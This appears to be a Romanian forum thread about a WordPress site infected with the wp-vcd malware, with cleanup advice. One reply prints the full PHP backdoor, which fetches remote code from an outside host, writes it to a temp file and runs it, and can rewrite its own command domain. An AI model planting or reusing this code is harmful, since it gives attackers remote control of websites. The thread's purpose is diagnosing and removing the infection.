Wordpress Site Hacked.

Sebastian

Active Member
Registered
Full Member
Am descoperit un site de-al meu care a fost "hackuit". Si spun hackuit pentru ca la o simpla scanare cu https://sitecheck.sucuri.net sau https://quttera.com/website-malware-scanner imi arata ca malware detectat. Din cate am citit pe net , este ca hackerul injecteaza cumva coduri in anumite fisiere din wordpress. Gen a generat un cod care creaza niste fisiere in wp-includes/wp-vcd.php - post.php - wp-tmp.php - wp-feed.php si diferite alte extensii in mai multe locuri. Chiar daca le sterg ele tot reapar. Stie cineva ce cod sa caut si sa sterg ? Ma intereseaza codul care creaza aceste fisiere ... A mai patit cineva asa ceva ?

In wp-vcd.php este acest cod :
https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution/blob/master/wp-vcd.php
 
este un caz clasic ... :)
Cauzele pot fi insa multiple ... am intalnit pana si cpanel infestat unde toate site-urile wordpress de pe un server administrat cu cpanel au generat fisiere care au schimbat index-ul site-urilor.
De obicei verific tema daca nu am incredere in sursa ei. Daca nu e nimic ciudat .. iau la mana pluginurile - mai ales pe cele recente sau cele care ar putea fi dubioase.
Codurile malitioase pot fi in footer.php, header.php sau functions.php - aceste fisiere avand rulaj in toate accesarile insa ... acum mai nou se pun fisiere .php care nu pot fi accesate asa usor din interfata wp-admin si trebuie sa navigi pe server pentru a ajunge la ele.
Orice cod pare dubios ... sterge-l :)
Functionalitatile de baza nu dispar daca aceste coduri sunt sterse insa unii chiar fac sa "sune"codul pe un site de-al lor si daca nu raspunde locul asta al lor ... template-ul crapa ..
Ma rog ... important ... cumparati temele si pluginurile ... nu le mai luati hakuite :)
 
1. se intampla de la theme sau plugin ******
2. probleme de server/host unde ai

Ce poti face?
1. descarca in calculator tot site-ul si scaneaza cu avg, mallwarebyte, spybot tot
2. schimba parola la wp-admin, ftp, cpanel, db, etc.
3. scaneaza calculatorul daca nu cumva esti chiar tu virusat
4. daca scanarea nu a gasit nimic (putin propabil) atunci fa comparatie manual la toate fisierele originale de la wordpress si theme sa vezi ce este in plus. Apoi chiar daca sunt acelasi numar de fisiere si foldere, trebuie sa te uiti la marimea acestora in kb cat si data la care au fost modificate ultima oara. Daca gasesti ceva, atunci manual cauti codul cu pricina sau rescrii cu cele default.
 
Asta instaleaza acel code:
Cod:
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {

                




                case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {
                            
                            if (!empty($_REQUEST['newdomain']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code2\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;

                
                
                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }
            
        die("");
    }

    


if ( ! function_exists( 'theme_temp_setup' ) ) { 
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

if($tmpcontent = @file_get_contents("http://www.spekt.cc/code2.php?i=".$path))
{


function theme_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}

extract(theme_temp_setup($tmpcontent));
}
}
}



?>
 
Am descarcat pe pc si am comparat fisierele intre ele in kb si am vazut care sunt modificate. Problema a inceput de la un plugin de pe un site fantoma in care am avut incredere desi nu trebuia. Solutia rezolvarii a fost stergand pluginul si stergand pe urma fisierele care au fost create de scriptul hack. Acum stiu ca veci nu voi mai instala teme sau scripturi de pe alte site uri untrusted . Am fost respins si de adwords din aceasta cauza si nu stiam cum sa ii dau de cap. Multumesc de raspuns.
 
1. se intampla de la theme sau plugin ******
2. probleme de server/host unde ai

Ce poti face?
1. descarca in calculator tot site-ul si scaneaza cu avg, mallwarebyte, spybot tot
2. schimba parola la wp-admin, ftp, cpanel, db, etc.
3. scaneaza calculatorul daca nu cumva esti chiar tu virusat
4. daca scanarea nu a gasit nimic (putin propabil) atunci fa comparatie manual la toate fisierele originale de la wordpress si theme sa vezi ce este in plus. Apoi chiar daca sunt acelasi numar de fisiere si foldere, trebuie sa te uiti la marimea acestora in kb cat si data la care au fost modificate ultima oara. Daca gasesti ceva, atunci manual cauti codul cu pricina sau rescrii cu cele default.
5. generezi alte coduri in wp-config.php
Cod:
/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
 
Loading...
Back
Sus